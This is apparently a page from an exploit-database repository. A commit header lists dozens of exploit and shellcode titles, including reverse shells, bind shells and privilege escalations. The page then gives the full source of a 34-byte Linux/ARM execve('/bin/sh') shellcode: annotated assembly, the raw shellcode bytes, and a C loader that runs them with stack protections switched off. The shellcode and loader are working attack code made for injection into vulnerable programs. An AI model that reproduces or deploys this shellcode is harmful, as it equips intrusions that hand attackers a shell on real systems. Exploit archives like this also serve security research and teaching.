81d6f781ab
31 changes to exploits/shellcodes MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation macOS - 'process_policy' Stack Leak Through Uninitialized Field Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read Jungo Windriver 12.5.1 - Privilege Escalation Jungo Windriver 12.5.1 - Local Privilege Escalation Parity Browser < 1.6.10 - Bypass Same Origin Policy Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit) phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit) eVestigator Forensic PenTester - MITM Remote Code Execution eVestigator Forensic PenTester - Man In The Middle Remote Code Execution BestSafe Browser - MITM Remote Code Execution BestSafe Browser - Man In The Middle Remote Code Execution SKILLS.com.au Industry App - MITM Remote Code Execution Virtual Postage (VPA) - MITM Remote Code Execution SKILLS.com.au Industry App - Man In The Middle Remote Code Execution Virtual Postage (VPA) - Man In The Middle Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution SAP NetWeaver J2EE Engine 7.40 - SQL Injection D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode HPUX - execve /bin/sh Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve /bin/sh Shellcode (58 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) ARM - Bind TCP Shell (0x1337/TCP) Shellcode ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode ARM - ifconfig eth0 192.168.0.2 up Shellcode Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD - reboot() Shellcode (15 Bytes) IRIX - execve(/bin/sh -c) Shellcode (72 bytes) IRIX - execve(/bin/sh) Shellcode (43 bytes) IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - execve(/bin/sh) Shellcode (68 bytes) IRIX - stdin-read Shellcode (40 bytes) Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
61 lines
No EOL
1.8 KiB
C
61 lines
No EOL
1.8 KiB
C
/*
|
|
Title: Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
|
|
Date: 2017-03-31
|
|
Tested: armv7l
|
|
Author: Jonathan 'dummys' Borgeaud - twitter: @dummys1337
|
|
fapperz.org
|
|
|
|
Shellcode ARM without 0x20, 0x0a and 0x00
|
|
|
|
assembly shellcode: as -o sc.o sc.s
|
|
|
|
.syntax unified
|
|
.global main
|
|
.code 32
|
|
main:
|
|
add r3, pc, #1 /* add 0x1 to pc to prepare the switch to thumb mode */
|
|
bx r3 /* switch to thumb mode */
|
|
.thumb
|
|
mov r0, pc /* move pc to r0 */
|
|
adds r0, #14 /* make r0 to point to /bin//sh */
|
|
str r0, [sp, #4] /* store /bin//sh to the stack */
|
|
subs r1, r1, r1 /* put 0 in r1 */
|
|
subs r2, r2, r2 /* put 0 in r2 */
|
|
movs r7, #8 /* move 8 in r7 */
|
|
str r2, [r0, r7] /* store nullbytes at the end of /bin//sh */
|
|
adds r7, #3 /* add 3 to r7 for execve syscall */
|
|
svc 1 /* call execve */
|
|
str r7, [r5, #32] /* thumb instruction for "/b" string */
|
|
ldr r1, [r5, #100] /* thumb instruction for "in" string */
|
|
cmp r7, #0x2f /* thumb instruction for "//" string */
|
|
ldr r3, [r6, #4] /* thumb instruction for "sh" string */
|
|
|
|
|
|
compiler c: gcc -marm -fno-stack-protector -z execstack -o loader loader.c
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
char *SC = "\x01\x30\x8f\xe2"
|
|
"\x13\xff\x2f\xe1"
|
|
"\x78\x46\x0e\x30"
|
|
"\x01\x90\x49\x1a"
|
|
"\x92\x1a\x08\x27"
|
|
"\xc2\x51\x03\x37"
|
|
"\x01\xdf\x2f\x62"
|
|
"\x69\x6e\x2f\x2f"
|
|
"\x73\x68";
|
|
|
|
int main(void)
|
|
{
|
|
char payload[34];
|
|
|
|
memcpy(payload, SC, 34);
|
|
|
|
fprintf(stdout, "Length: %d\n", strlen(SC));
|
|
(*(void(*)()) payload) ();
|
|
|
|
return 0;
|
|
} |